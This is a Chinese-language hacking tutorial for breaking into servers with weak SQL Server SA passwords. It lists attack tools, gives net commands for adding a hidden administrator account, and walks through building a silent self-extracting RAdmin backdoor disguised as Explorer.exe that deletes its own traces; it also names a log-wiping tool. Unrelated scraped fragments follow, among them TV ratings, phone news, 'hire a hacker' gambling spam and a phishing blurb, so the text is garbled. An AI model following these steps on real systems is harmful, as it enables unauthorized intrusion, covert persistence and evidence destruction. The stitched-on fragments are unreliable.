工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:
08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。
一.扫到SA弱口令(自动攻击器)
二.用SQLTOOLS连上去建一个用户
net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员
三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)
*** RAD.EXE过程:
1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地设置服务端(一定要生成);
设置密码-->>设置连接端口(默认4489)-->>生成
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;
4、编写一个批处理,并命名为u.bat;
@echo offnet stop r_server
5、写第二个批处理,r.bat,内容为:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;
7、将Rad.rar *** 成自解压文件;
选择Default.sfx的自释放模块-->>高级自释放选项
-->>常规
释放路径:%systemroot%\\system32
安装程序:释放后运行:r.bat 释放前运行u.bat
-->>摸式
缄默模式:全部隐藏 覆盖方式:覆盖所有文件
以下是《盛夏晚晴天》在江苏卫视《幸福剧场》上星期间的收视率《盛夏晚晴天》全集CSM45城收视率日期集数收视率收视份额全国同时段排名4月25日1-30.86。 《盛夏晚晴天》演员表:刘恺威饰乔津帆杨幂饰...
0x05 相关链接 'ADMIN_LOGIN' => '".$_POST['db_login']', //创始人账号 Description: IP addr...
wp手机将先发选用骁龙830CPU wp手机传言首先配用骁龙830。长须鲸TMT讯 4月18日信息,高通芯片做为时下流行旗舰机配用的CPU知名品牌,其更新换代一直遭受大家的关心。前不久有信息曝料称...
找黑客攻击赌博黑客高手联系方式找黑客攻击赌博相关问题黑客高手联系方式相关问题黑客如何操控手机手机蓝牙控制手机拍照app手机蓝牙怎么传app电脑被黑客入侵如何查。可以再网上找你适合的承供商,再进行注册,...
近段时间以来,直升机发生故障的事件在国内外接二连三的发生,9月26日四川一直升机造成3人死亡的事件还没完全淡化,9月29日日本自卫队一黑鹰直升机发生故障,这驾直升机还好下降的及时,并没有造成人员伤亡。...
尽管许多用户或许认为自己能够分辨出实在网站和垂钓网站之间的差异,但网络犯罪分子经过嵌入知名品牌的logo、相关图片以及网站界面款式,确实是能够诈骗很大一部分用户,这也是许多网络犯罪分子惯用的手段。 或...